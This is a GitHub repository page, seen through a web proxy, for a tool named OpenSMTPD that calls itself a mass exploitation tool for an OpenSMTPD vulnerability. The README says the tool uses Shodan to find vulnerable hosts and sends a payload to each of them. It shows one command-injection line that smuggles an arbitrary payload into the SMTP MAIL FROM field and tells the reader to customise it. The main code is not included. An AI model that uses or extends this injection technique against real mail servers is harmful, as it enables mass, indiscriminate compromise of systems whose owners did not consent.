8000 GitHub - optionalg/OpenSMTPD: A mass exploitation tool for CVE 2020-8793
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

optionalg/OpenSMTPD

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 

Repository files navigation

OpenSMTPD

A mass exploitation tool for CVE 2020-8793


Info

The Shodan API to find vulnerable devices and mass sends a payload to the target

To customize the payload :

s.send(bytes(f'MAIL FROM:<;{payload};>\r\n', 'utf-8'))

Change the variable 'payload' to your desired payload


TODO

  • Release Main Code
  • Add Threading
  • Add Payload Input
  • Make Error Outputs
  • Make Time Logs

Systems

  • Tested Systems:
    • Parrot OS Home
    • Kali Linux Mate
    • Windows 10
    • Windows 7
    • Ubuntu 20.2

Example

Example

About

A mass exploitation tool for CVE 2020-8793

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

0